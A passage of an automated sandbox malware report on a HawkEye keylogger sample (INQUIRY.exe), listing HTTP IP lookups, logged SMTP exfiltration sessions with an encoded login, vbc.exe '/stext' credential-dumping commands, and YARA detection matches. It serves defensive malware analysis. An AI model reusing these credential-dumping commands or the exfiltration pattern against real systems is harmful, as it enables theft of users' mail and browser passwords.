                                                                      Nov 18, 2020 15:02:38.523021936 CET844OUTGET / HTTP/1.1
                                                                      Host: whatismyipaddress.com
                                                                      Connection: Keep-Alive
                                                                      Nov 18, 2020 15:02:38.549550056 CET844INHTTP/1.1 301 Moved Permanently
                                                                      Date: Wed, 18 Nov 2020 14:02:38 GMT
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Cache-Control: max-age=3600
                                                                      Expires: Wed, 18 Nov 2020 15:02:38 GMT
                                                                      Location: https://whatismyipaddress.com/
                                                                      cf-request-id: 067d432e42000063776eb34000000001
                                                                      Server: cloudflare
                                                                      CF-RAY: 5f423af6cb926377-FRA
                                                                      Data Raw: 30 0d 0a 0d 0a
                                                                      Data Ascii: 0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      2192.168.2.449776104.16.154.3680C:\Users\user\Desktop\INQUIRY.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Nov 18, 2020 15:03:21.354469061 CET5549OUTGET / HTTP/1.1
                                                                      Host: whatismyipaddress.com
                                                                      Connection: Keep-Alive
                                                                      Nov 18, 2020 15:03:21.376317978 CET5550INHTTP/1.1 301 Moved Permanently
                                                                      Date: Wed, 18 Nov 2020 14:03:21 GMT
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Cache-Control: max-age=3600
                                                                      Expires: Wed, 18 Nov 2020 15:03:21 GMT
                                                                      Location: https://whatismyipaddress.com/
                                                                      cf-request-id: 067d43d59000002c2ed824b000000001
                                                                      Server: cloudflare
                                                                      CF-RAY: 5f423c0288692c2e-FRA
                                                                      Data Raw: 30 0d 0a 0d 0a
                                                                      Data Ascii: 0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      3192.168.2.449783104.16.155.3680C:\Users\user\Desktop\INQUIRY.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Nov 18, 2020 15:03:33.843103886 CET5584OUTGET / HTTP/1.1
                                                                      Host: whatismyipaddress.com
                                                                      Connection: Keep-Alive
                                                                      Nov 18, 2020 15:03:33.867271900 CET5584INHTTP/1.1 301 Moved Permanently
                                                                      Date: Wed, 18 Nov 2020 14:03:33 GMT
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Cache-Control: max-age=3600
                                                                      Expires: Wed, 18 Nov 2020 15:03:33 GMT
                                                                      Location: https://whatismyipaddress.com/
                                                                      cf-request-id: 067d44065900002b95012f5000000001
                                                                      Server: cloudflare
                                                                      CF-RAY: 5f423c508af42b95-FRA
                                                                      Data Raw: 30 0d 0a 0d 0a
                                                                      Data Ascii: 0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      4192.168.2.449790104.16.155.3680C:\Users\user\Desktop\INQUIRY.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Nov 18, 2020 15:04:00.721941948 CET5624OUTGET / HTTP/1.1
                                                                      Host: whatismyipaddress.com
                                                                      Connection: Keep-Alive
                                                                      Nov 18, 2020 15:04:00.753989935 CET5624INHTTP/1.1 301 Moved Permanently
                                                                      Date: Wed, 18 Nov 2020 14:04:00 GMT
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Cache-Control: max-age=3600
                                                                      Expires: Wed, 18 Nov 2020 15:04:00 GMT
                                                                      Location: https://whatismyipaddress.com/
                                                                      cf-request-id: 067d446f5c0000d6bda83ec000000001
                                                                      Server: cloudflare
                                                                      CF-RAY: 5f423cf88d18d6bd-FRA
                                                                      Data Raw: 30 0d 0a 0d 0a
                                                                      Data Ascii: 0


                                                                      SMTP Packets

                                                                      TimestampSource PortDest PortSource IPDest IPCommands
                                                                      Nov 18, 2020 15:02:24.647198915 CET58749750166.62.27.57192.168.2.4220-sg2plcpnl0157.prod.sin2.secureserver.net ESMTP Exim 4.93 #2 Wed, 18 Nov 2020 07:02:24 -0700
                                                                      220-We do not authorize the use of this system to transport unsolicited,
                                                                      220 and/or bulk e-mail.
                                                                      Nov 18, 2020 15:02:24.825001001 CET49750587192.168.2.4166.62.27.57EHLO 445817
                                                                      Nov 18, 2020 15:02:25.106144905 CET58749750166.62.27.57192.168.2.4250-sg2plcpnl0157.prod.sin2.secureserver.net Hello 445817 [84.17.52.40]
                                                                      250-SIZE 52428800
                                                                      250-8BITMIME
                                                                      250-PIPELINING
                                                                      250-AUTH PLAIN LOGIN
                                                                      250-CHUNKING
                                                                      250-STARTTLS
                                                                      250-SMTPUTF8
                                                                      250 HELP
                                                                      Nov 18, 2020 15:02:25.106544971 CET49750587192.168.2.4166.62.27.57AUTH login YW5zYWZAaWlnY2VzdC5jb20=
                                                                      Nov 18, 2020 15:02:25.388585091 CET58749750166.62.27.57192.168.2.4334 UGFzc3dvcmQ6
                                                                      Nov 18, 2020 15:02:25.858115911 CET58749750166.62.27.57192.168.2.4235 Authentication succeeded
                                                                      Nov 18, 2020 15:02:25.858395100 CET49750587192.168.2.4166.62.27.57MAIL FROM:<ansaf@iigcest.com>
                                                                      Nov 18, 2020 15:02:26.139451027 CET58749750166.62.27.57192.168.2.4250 OK
                                                                      Nov 18, 2020 15:02:26.139874935 CET49750587192.168.2.4166.62.27.57RCPT TO:<ansaf@iigcest.com>
                                                                      Nov 18, 2020 15:02:26.422636032 CET58749750166.62.27.57192.168.2.4250 Accepted
                                                                      Nov 18, 2020 15:02:26.422939062 CET49750587192.168.2.4166.62.27.57DATA
                                                                      Nov 18, 2020 15:02:26.703959942 CET58749750166.62.27.57192.168.2.4354 Enter message, ending with "." on a line by itself
                                                                      Nov 18, 2020 15:02:26.705427885 CET49750587192.168.2.4166.62.27.57.
                                                                      Nov 18, 2020 15:02:27.002060890 CET58749750166.62.27.57192.168.2.4250 OK id=1kfO2U-008ZMO-Gu
                                                                      Nov 18, 2020 15:03:06.695435047 CET58749774166.62.27.57192.168.2.4220-sg2plcpnl0157.prod.sin2.secureserver.net ESMTP Exim 4.93 #2 Wed, 18 Nov 2020 07:03:06 -0700
                                                                      220-We do not authorize the use of this system to transport unsolicited,
                                                                      220 and/or bulk e-mail.
                                                                      Nov 18, 2020 15:03:06.695717096 CET49774587192.168.2.4166.62.27.57EHLO 445817
                                                                      Nov 18, 2020 15:03:06.958623886 CET58749774166.62.27.57192.168.2.4250-sg2plcpnl0157.prod.sin2.secureserver.net Hello 445817 [84.17.52.40]
                                                                      250-SIZE 52428800
                                                                      250-8BITMIME
                                                                      250-PIPELINING
                                                                      250-AUTH PLAIN LOGIN
                                                                      250-CHUNKING
                                                                      250-STARTTLS
                                                                      250-SMTPUTF8
                                                                      250 HELP
                                                                      Nov 18, 2020 15:03:06.959141970 CET49774587192.168.2.4166.62.27.57AUTH login YW5zYWZAaWlnY2VzdC5jb20=
                                                                      Nov 18, 2020 15:03:07.222193003 CET58749774166.62.27.57192.168.2.4334 UGFzc3dvcmQ6
                                                                      Nov 18, 2020 15:03:07.495678902 CET58749774166.62.27.57192.168.2.4235 Authentication succeeded
                                                                      Nov 18, 2020 15:03:07.495965004 CET49774587192.168.2.4166.62.27.57MAIL FROM:<ansaf@iigcest.com>
                                                                      Nov 18, 2020 15:03:07.758713007 CET58749774166.62.27.57192.168.2.4250 OK
                                                                      Nov 18, 2020 15:03:07.758955002 CET49774587192.168.2.4166.62.27.57RCPT TO:<ansaf@iigcest.com>
                                                                      Nov 18, 2020 15:03:08.022917032 CET58749774166.62.27.57192.168.2.4250 Accepted
                                                                      Nov 18, 2020 15:03:08.025825977 CET49774587192.168.2.4166.62.27.57DATA
                                                                      Nov 18, 2020 15:03:08.288832903 CET58749774166.62.27.57192.168.2.4354 Enter message, ending with "." on a line by itself
                                                                      Nov 18, 2020 15:03:08.290122032 CET49774587192.168.2.4166.62.27.57.
                                                                      Nov 18, 2020 15:03:08.570868969 CET58749774166.62.27.57192.168.2.4250 OK id=1kfO3A-008aRf-3m

                                                                      Code Manipulations

                                                                      Statistics

                                                                      Behavior

                                                                      Click to jump to process

                                                                      System Behavior

                                                                      Analysis Process: INQUIRY.exe PID: 2016 Parent PID: 5852

                                                                      General

                                                                      Start time:15:01:48
                                                                      Start date:18/11/2020
                                                                      Path:C:\Users\user\Desktop\INQUIRY.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:'C:\Users\user\Desktop\INQUIRY.exe'
                                                                      Imagebase:0x400000
                                                                      File size:1009664 bytes
                                                                      MD5 hash:0B940145D7D02E5B1B975C99DD5197A4
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:Borland Delphi
                                                                      Yara matches:
                                                                      • Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 00000000.00000002.656291540.0000000002642000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                      • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000000.00000002.656291540.0000000002642000.00000040.00000001.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 00000000.00000002.656291540.0000000002642000.00000040.00000001.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000000.00000002.656291540.0000000002642000.00000040.00000001.sdmp, Author: Joe Security
                                                                      • Rule: Hawkeye, Description: detect HawkEye in memory, Source: 00000000.00000002.656291540.0000000002642000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                      • Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 00000000.00000002.656369760.00000000026D7000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                      • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000000.00000002.656369760.00000000026D7000.00000040.00000001.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 00000000.00000002.656369760.00000000026D7000.00000040.00000001.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000000.00000002.656369760.00000000026D7000.00000040.00000001.sdmp, Author: Joe Security
                                                                      • Rule: Hawkeye, Description: detect HawkEye in memory, Source: 00000000.00000002.656369760.00000000026D7000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                      Reputation:low

                                                                      Analysis Process: INQUIRY.exe PID: 5896 Parent PID: 2016

                                                                      General

                                                                      Start time:15:01:49
                                                                      Start date:18/11/2020
                                                                      Path:C:\Users\user\Desktop\INQUIRY.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:'C:\Users\user\Desktop\INQUIRY.exe'
                                                                      Imagebase:0x400000
                                                                      File size:1009664 bytes
                                                                      MD5 hash:0B940145D7D02E5B1B975C99DD5197A4
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:.Net C# or VB.NET
                                                                      Yara matches:
                                                                      • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000001.00000002.741822453.0000000003A41000.00000004.00000001.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000001.00000002.741822453.0000000003A41000.00000004.00000001.sdmp, Author: Joe Security
                                                                      • Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 00000001.00000002.737101791.0000000002272000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                      • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000001.00000002.737101791.0000000002272000.00000004.00000001.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 00000001.00000002.737101791.0000000002272000.00000004.00000001.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000001.00000002.737101791.0000000002272000.00000004.00000001.sdmp, Author: Joe Security
                                                                      • Rule: Hawkeye, Description: detect HawkEye in memory, Source: 00000001.00000002.737101791.0000000002272000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                      • Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 00000001.00000002.735055042.0000000000402000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                      • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000001.00000002.735055042.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 00000001.00000002.735055042.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000001.00000002.735055042.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                      • Rule: Hawkeye, Description: detect HawkEye in memory, Source: 00000001.00000002.735055042.0000000000402000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                      • Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 00000001.00000002.735183511.0000000000497000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                      • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000001.00000002.735183511.0000000000497000.00000040.00000001.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 00000001.00000002.735183511.0000000000497000.00000040.00000001.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000001.00000002.735183511.0000000000497000.00000040.00000001.sdmp, Author: Joe Security
                                                                      • Rule: Hawkeye, Description: detect HawkEye in memory, Source: 00000001.00000002.735183511.0000000000497000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                      • Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 00000001.00000002.736771009.00000000021E0000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                      • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000001.00000002.736771009.00000000021E0000.00000004.00000001.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 00000001.00000002.736771009.00000000021E0000.00000004.00000001.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000001.00000002.736771009.00000000021E0000.00000004.00000001.sdmp, Author: Joe Security
                                                                      • Rule: Hawkeye, Description: detect HawkEye in memory, Source: 00000001.00000002.736771009.00000000021E0000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                      • Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 00000001.00000002.739090343.0000000002A41000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                      • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 00000001.00000002.739090343.0000000002A41000.00000004.00000001.sdmp, Author: Joe Security
                                                                      • Rule: Hawkeye, Description: detect HawkEye in memory, Source: 00000001.00000002.739090343.0000000002A41000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                      • Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 00000001.00000002.737371268.0000000002302000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                      • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000001.00000002.737371268.0000000002302000.00000040.00000001.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 00000001.00000002.737371268.0000000002302000.00000040.00000001.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000001.00000002.737371268.0000000002302000.00000040.00000001.sdmp, Author: Joe Security
                                                                      • Rule: Hawkeye, Description: detect HawkEye in memory, Source: 00000001.00000002.737371268.0000000002302000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                      Reputation:low

                                                                      Analysis Process: INQUIRY.exe PID: 5788 Parent PID: 2016

                                                                      General

                                                                      Start time:15:01:50
                                                                      Start date:18/11/2020
                                                                      Path:C:\Users\user\Desktop\INQUIRY.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:'C:\Users\user\Desktop\INQUIRY.exe' 2 5896 5358953
                                                                      Imagebase:0x400000
                                                                      File size:1009664 bytes
                                                                      MD5 hash:0B940145D7D02E5B1B975C99DD5197A4
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:Borland Delphi
                                                                      Reputation:low

                                                                      Analysis Process: dw20.exe PID: 6868 Parent PID: 5896

                                                                      General

                                                                      Start time:15:01:59
                                                                      Start date:18/11/2020
                                                                      Path:C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:dw20.exe -x -s 2308
                                                                      Imagebase:0x10000000
                                                                      File size:33936 bytes
                                                                      MD5 hash:8D10DA8A3E11747E51F23C882C22BBC3
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high

                                                                      Analysis Process: vbc.exe PID: 6664 Parent PID: 5896

                                                                      General

                                                                      Start time:15:02:02
                                                                      Start date:18/11/2020
                                                                      Path:C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holdermail.txt'
                                                                      Imagebase:0x400000
                                                                      File size:1171592 bytes
                                                                      MD5 hash:C63ED21D5706A527419C9FBD730FFB2E
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Yara matches:
                                                                      • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000005.00000002.692418330.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                      Reputation:high

                                                                      Analysis Process: vbc.exe PID: 6700 Parent PID: 5896

                                                                      General

                                                                      Start time:15:02:03
                                                                      Start date:18/11/2020
                                                                      Path:C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holderwb.txt'
                                                                      Imagebase:0x400000
                                                                      File size:1171592 bytes
                                                                      MD5 hash:C63ED21D5706A527419C9FBD730FFB2E
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Yara matches:
                                                                      • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000006.00000002.695692485.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                      Reputation:high

                                                                      Analysis Process: WerFault.exe PID: 6776 Parent PID: 5896

                                                                      General

                                                                      Start time:15:02:08
                                                                      Start date:18/11/2020
                                                                      Path:C:\Windows\SysWOW64\WerFault.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 5896 -s 2216
                                                                      Imagebase:0x990000
                                                                      File size:434592 bytes
                                                                      MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:.Net C# or VB.NET
                                                                      Yara matches:
                                                                      • Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 00000009.00000002.731445229.0000000005040000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                      • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 00000009.00000002.731445229.0000000005040000.00000004.00000001.sdmp, Author: Joe Security
                                                                      • Rule: Hawkeye, Description: detect HawkEye in memory, Source: 00000009.00000002.731445229.0000000005040000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                      Reputation:high

                                                                      Analysis Process: INQUIRY.exe PID: 6076 Parent PID: 5788

                                                                      General

                                                                      Start time:15:02:33
                                                                      Start date:18/11/2020
                                                                      Path:C:\Users\user\Desktop\INQUIRY.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:C:\Users\user\Desktop\INQUIRY.exe
                                                                      Imagebase:0x400000
                                                                      File size:1009664 bytes
                                                                      MD5 hash:0B940145D7D02E5B1B975C99DD5197A4
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:Borland Delphi
                                                                      Yara matches:
                                                                      • Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 0000000D.00000002.756918468.0000000002662000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                      • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 0000000D.00000002.756918468.0000000002662000.00000040.00000001.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 0000000D.00000002.756918468.0000000002662000.00000040.00000001.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 0000000D.00000002.756918468.0000000002662000.00000040.00000001.sdmp, Author: Joe Security
                                                                      • Rule: Hawkeye, Description: detect HawkEye in memory, Source: 0000000D.00000002.756918468.0000000002662000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                      • Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 0000000D.00000002.757155287.00000000026F7000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                      • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 0000000D.00000002.757155287.00000000026F7000.00000040.00000001.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 0000000D.00000002.757155287.00000000026F7000.00000040.00000001.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 0000000D.00000002.757155287.00000000026F7000.00000040.00000001.sdmp, Author: Joe Security
                                                                      • Rule: Hawkeye, Description: detect HawkEye in memory, Source: 0000000D.00000002.757155287.00000000026F7000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                      Reputation:low

                                                                      Analysis Process: INQUIRY.exe PID: 6808 Parent PID: 6076

                                                                      General

                                                                      Start time:15:02:34
                                                                      Start date:18/11/2020
                                                                      Path:C:\Users\user\Desktop\INQUIRY.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:C:\Users\user\Desktop\INQUIRY.exe
                                                                      Imagebase:0x400000
                                                                      File size:1009664 bytes
                                                                      MD5 hash:0B940145D7D02E5B1B975C99DD5197A4
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:.Net C# or VB.NET
                                                                      Yara matches:
                                                                      • Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 00000010.00000002.825855451.00000000022E0000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                      • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000010.00000002.825855451.00000000022E0000.00000004.00000001.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 00000010.00000002.825855451.00000000022E0000.00000004.00000001.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000010.00000002.825855451.00000000022E0000.00000004.00000001.sdmp, Author: Joe Security
                                                                      • Rule: Hawkeye, Description: detect HawkEye in memory, Source: 00000010.00000002.825855451.00000000022E0000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                      • Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 00000010.00000001.752146287.00000000004D2000.00000040.00020000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                      • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000010.00000001.752146287.00000000004D2000.00000040.00020000.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 00000010.00000001.752146287.00000000004D2000.00000040.00020000.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000010.00000001.752146287.00000000004D2000.00000040.00020000.sdmp, Author: Joe Security
                                                                      • Rule: Hawkeye, Description: detect HawkEye in memory, Source: 00000010.00000001.752146287.00000000004D2000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                      • Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 00000010.00000002.828298688.0000000002E11000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                      • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 00000010.00000002.828298688.0000000002E11000.00000004.00000001.sdmp, Author: Joe Security
                                                                      • Rule: Hawkeye, Description: detect HawkEye in memory, Source: 00000010.00000002.828298688.0000000002E11000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                      • Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 00000010.00000002.826009202.0000000002372000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                      • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000010.00000002.826009202.0000000002372000.00000004.00000001.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 00000010.00000002.826009202.0000000002372000.00000004.00000001.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000010.00000002.826009202.0000000002372000.00000004.00000001.sdmp, Author: Joe Security
                                                                      • Rule: Hawkeye, Description: detect HawkEye in memory, Source: 00000010.00000002.826009202.0000000002372000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                      • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000010.00000002.829490755.0000000003E11000.00000004.00000001.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000010.00000002.829490755.0000000003E11000.00000004.00000001.sdmp, Author: Joe Security
                                                                      • Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 00000010.00000002.824784026.0000000000402000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                      • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000010.00000002.824784026.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 00000010.00000002.824784026.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000010.00000002.824784026.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                      • Rule: Hawkeye, Description: detect HawkEye in memory, Source: 00000010.00000002.824784026.0000000000402000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                      • Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 00000010.00000002.826605147.0000000002492000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                      • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000010.00000002.826605147.0000000002492000.00000040.00000001.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 00000010.00000002.826605147.0000000002492000.00000040.00000001.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000010.00000002.826605147.0000000002492000.00000040.00000001.sdmp, Author: Joe Security
                                                                      • Rule: Hawkeye, Description: detect HawkEye in memory, Source: 00000010.00000002.826605147.0000000002492000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                      • Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 00000010.00000002.824923724.0000000000497000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                      • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000010.00000002.824923724.0000000000497000.00000040.00000001.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 00000010.00000002.824923724.0000000000497000.00000040.00000001.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000010.00000002.824923724.0000000000497000.00000040.00000001.sdmp, Author: Joe Security
                                                                      • Rule: Hawkeye, Description: detect HawkEye in memory, Source: 00000010.00000002.824923724.0000000000497000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                      Reputation:low

